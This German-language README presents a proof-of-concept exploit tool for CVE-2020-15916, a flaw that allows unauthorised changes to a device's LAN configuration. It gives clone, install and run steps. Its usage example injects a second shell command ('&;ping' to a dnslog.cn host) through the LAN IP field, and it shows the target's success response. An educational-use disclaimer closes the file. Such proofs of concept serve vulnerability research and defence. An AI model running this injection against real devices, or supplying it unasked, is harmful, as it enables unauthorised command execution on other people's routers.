
Dieses Projekt ist ein PoC zur Ausnutzung von CVE-2020-15916, einer Schwachstelle, die unbefugte Änderungen an der LAN-Konfiguration eines Geräts ermöglicht.
GenLANConfigAttack - ist ein PoC zur Ausnutzung von CVE-2020-15916, einer Schwachstelle, die unbefugte Änderungen an der LAN-Konfiguration eines Geräts ermöglicht.
git clone https://github.com/geniuszly/CVE-2020-15916
pip install -r requirements.txt
python GenLANConfigAttack.py
target_ip: Die IP-Adresse des Zielgeräts.ping_command: Der Befehl, der auf dem Zielgerät ausgeführt werden soll.session_password: Das Passwort für den Sitzungszugriff.python GenLANConfigAttack.py --target_ip 192.168.0.1 --session_password gew43t4gtewe4u5u576i7yhggerr6ijtr --ping_command '192.168.0.1 &;ping xt68nd.dnslog.cn'
[Response from 192.168.0.1]:
{"success":true,"message":"LAN IP configuration updated successfully"}
Dieses PoC bezieht sich auf die Schwachstelle CVE-2020-15916, die es Angreifern ermöglicht, die LAN-Konfiguration anfälliger Geräte durch Ausnutzung eines schwachen Authentifizierungsmechanismus zu ändern.
Dieses Tool dient ausschließlich zu Bildungszwecken. Verwenden Sie es verantwortungsvoll und nur in Umgebungen, in denen Sie ausdrückliche Genehmigung haben.